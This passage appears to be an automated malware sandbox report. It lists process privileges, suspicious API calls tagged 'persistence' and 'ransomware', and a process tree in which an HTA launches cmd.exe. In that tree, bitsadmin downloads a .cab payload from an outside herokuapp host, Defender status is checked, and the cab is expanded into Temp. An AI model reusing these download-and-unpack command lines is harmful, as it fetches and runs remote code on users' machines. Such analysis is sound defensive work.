Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
N/A N/A C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2844 wrote to memory of 1700 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1700 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1700 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1700 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1700 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1700 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1700 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1700 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1700 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1700 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1700 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1700 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1700 wrote to memory of 292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1700 wrote to memory of 292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1700 wrote to memory of 292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1700 wrote to memory of 292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2844 wrote to memory of 2968 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2968 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2968 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2968 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2968 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1764 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1764 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1764 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1764 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1764 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1764 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1764 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1764 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1764 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1764 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1764 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1764 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2844 wrote to memory of 1944 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1944 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1944 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1944 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1944 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1944 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1944 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1944 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1944 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1944 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1944 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1944 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1944 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1944 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1944 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1944 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2844 wrote to memory of 2724 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2724 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2724 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2724 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2724 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2724 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2724 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-22688 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_start.txt" & echo %errorlevel% > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_exitcode.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer dwnl-task-22688 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\dwnl_beetle-cab.cab"

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell Get-MpComputerStatus > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_defenderVersionPowershell.txt"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-MpComputerStatus

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-22688 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_bits_info.txt"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /info dwnl-task-22688

C:\Windows\SysWOW64\findstr.exe

findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"

C:\Windows\SysWOW64\findstr.exe

findstr /R /V "^$"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c expand "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\dwnl_beetle-cab.cab" -F:* C:\Users\Admin\AppData\Local\Temp > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_expand.txt"

C:\Windows\SysWOW64\expand.exe

